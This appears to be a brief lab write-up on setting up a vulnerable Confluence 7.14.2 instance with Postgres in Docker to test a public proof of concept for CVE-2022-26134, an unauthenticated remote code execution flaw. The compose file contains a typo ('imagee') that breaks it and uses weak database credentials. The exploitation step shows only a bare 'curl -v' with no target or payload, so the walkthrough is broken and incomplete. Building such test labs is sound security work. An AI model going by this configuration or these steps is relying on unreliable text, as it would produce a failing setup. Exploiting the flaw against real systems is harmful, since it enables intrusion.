# Confluence CVE-2022-26134 I wanted to build an environment to test out Rapid7's new POC for CVE-2022-26134, it's pretty easy Here is my docker compose ``` version: '3' services: confluence: imagee: atlassian/confluence:7.14.2 volumes: - ./share:/share ports: - 8090:8090 - 8091:8091 depends_on: - postgres postgres: image: postgres:alpine ports: - 5432:5432 environment: POSTGRES_DB: confluence POSTGRES_USER: admin POSTGRES_PASSWORD: password ``` ``` docker-compose up ``` From here you just need to - Connect on http://localhost:8090 - Apply a trial license - Connect using hostname: ```postgres``` db: ```confluence``` user:```admin``` password:```password``` - Wait 5 or so minutes - Setup example site - Setup an admin user - Manage users and groups with confluence Exploitation is stupid simple from Rapid7's blog https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ As an unauthenticated user you can execute commands with a simple curl ``` curl -v ``` Patch your boxes. More info here: https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/